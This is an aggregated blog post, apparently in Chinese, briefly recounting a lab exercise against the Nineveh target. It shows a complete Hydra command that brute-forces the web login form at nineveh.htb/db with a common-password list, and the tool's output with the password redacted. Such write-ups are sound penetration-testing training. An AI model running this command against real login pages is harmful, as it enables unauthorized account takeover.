稻草人新闻RSS 聚合阅读

← 返回 ✍️ 个人博客

Login Brute Forcing

ABB00717 6 天前 blog.abb00717.com

Nineveh

在 Nineveh 靶機中,我使用 Hydra 配合 xato-net-10-million-passwords-10000.txt 辭典成功爆破出 https://nineveh.htb/db 的 password123:

$ hydra -l admin -P /usr/share/SecLists/Passwords/Common-Credentials/xato-net-10-million-passwords-10000.txt -s 443 -S nineveh.htb https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password." -t 40 -f -V
...<SNIP>...
[443][http-post-form] host: nineveh.htb   login: admin   password: <REDACTED>
[STATUS] attack finished for nineveh.htb (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-09-17 12:54:18

在原文站打开 ↗

Cloudflare Workers 每 3 分钟抓一批,9 批轮完最快约 27 分钟 · 点右上 ↻ 立刻全量抓一次